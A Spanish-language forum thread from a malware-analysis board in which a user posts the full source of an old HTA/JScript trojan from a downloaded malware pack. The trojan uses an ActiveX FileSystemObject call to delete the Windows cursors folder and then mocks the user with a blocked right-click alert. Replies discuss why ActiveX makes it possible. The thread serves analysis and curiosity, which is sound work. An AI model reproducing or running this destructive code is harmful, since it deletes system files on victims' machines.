Trojan.JS.Cursor

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

19 Abril 2024, 19:54 pm

Tema destacado: Tutorial básico de Quickjs

Foro de elhacker.net

Seguridad Informática

Análisis y Diseño de Malware (Moderador: fary)

Trojan.JS.Cursor

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Ir Abajo

Respuesta

Imprimir

Autor

Tema: Trojan.JS.Cursor (Leído 3,256 veces)

patilanz

Desconectado

Desconectado

Mensajes: 481

555-555-0199@example.com

Ver Perfil

WWW

Trojan.JS.Cursor

« en: 24 Diciembre 2014, 10:33 am »

Hola me descargue un pack con muchos troyanos virus etc.. y ahora los estoy analizando.

Código

[code=javascript]<HTML>
<HEAD>
 
<TITLE>Virus</TITLE>
 
<script language="JScript">
 
var fs = new ActiveXObject("Scripting.FileSystemObject");
var a = fs.DeleteFolder("c:\\windows/cursors");
 
</script>
 
<HTA:APPLICATION
       ID="oHTA"
       APPLICATIONNAME="ComplexHTA"
       CAPTION="yes"
       ICON="ComplexHTA.ico"
       MAXIMIZEBUTTON="no"
       MINIMIZEBUTTON="no"
       SHOWINTASKBAR="no"
       SINGLEINSTANCE="no"
       SYSMENU="no"
       VERSION="1.0"
       WINDOWSTATE="normal">
 
<script language="javascript">
 
var message="Now Hang On Here!";
 
function click(e) {
if (document.all) {
if (event.button == 2) {
alert(message);
return false;
}
}
if (document.layers) {
if (e.which == 3) {
alert(message);
return false;
}
}
}
if (document.layers) {
document.captureEvents(Event.MOUSEDOWN);
}
document.onmousedown=click;
 
</script>
 
</HEAD>
 
<BODY BGCOLOR="000000" TEXT="FFFFFF" LINK="6BC8F2" VLINK="6BC8F2" ALINK="6BC8F2">
 
<BR>
<BR>
<BR>
 
<CENTER>Congratulations!</CENTER>
 
<P>
 
<center><BUTTON onclick="self.close()">Click Here To Close
 
</BUTTON></center>
 
</HTML>

[/code]

Supongo que sera muy muy antiguo porque:

Código

var fs = new ActiveXObject("Scripting.FileSystemObject");
var a = fs.DeleteFolder("c:\\windows/cursors");

Borra la carpeta cursors así sin mas y luego se burla de que no puede pulsar el botón para salir

Que os parece?


	En línea

BlackM4ster

Desconectado

Desconectado

Mensajes: 499

Error, el teclado no funciona. Pulse F1 para continuar

Ver Perfil

WWW

Re: Trojan.JS.Cursor

« Respuesta #1 en: 24 Diciembre 2014, 10:43 am »

No creo que javascript actualmente pueda borrar una carpeta del sistema xD


	En línea

- Pásate por mi web -
https://codeisc.com

engel lex

Moderador Global

Desconectado

Desconectado

Mensajes: 15.514

Ver Perfil

Re: Trojan.JS.Cursor

« Respuesta #2 en: 24 Diciembre 2014, 10:46 am »

Cita de: BlackM4ster en 24 Diciembre 2014, 10:43 am

No creo que javascript actualmente pueda borrar una carpeta del sistema xD

no es el jscript solo... es el activeX que lo hace vulnerable, permitiendo escapar del navegador


	En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

Páginas: [1]

Ir Arriba

Respuesta

Imprimir

Ir a:

Mensajes similares
		Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
		Cursor de la página Sugerencias y dudas sobre el Foro	pipogorosito	6	2,647	3 Enero 2005, 14:17 pm por OxKuRiTo
		Cursor XP Diseño Gráfico	Free-Knowledgend	0	1,834	20 Enero 2005, 19:54 pm por Free-Knowledgend
		Cursor Programación Visual Basic	yeikos	6	2,376	29 Agosto 2006, 03:45 am por Red Mx
		Cursor??? « 1 2 » Programación Visual Basic	hepy_92	12	3,984	27 Mayo 2007, 20:47 pm por hepy_92
		Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan? Análisis y Diseño de Malware	dega1980	3	2,954	13 Abril 2014, 19:34 pm por .:UND3R:.

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines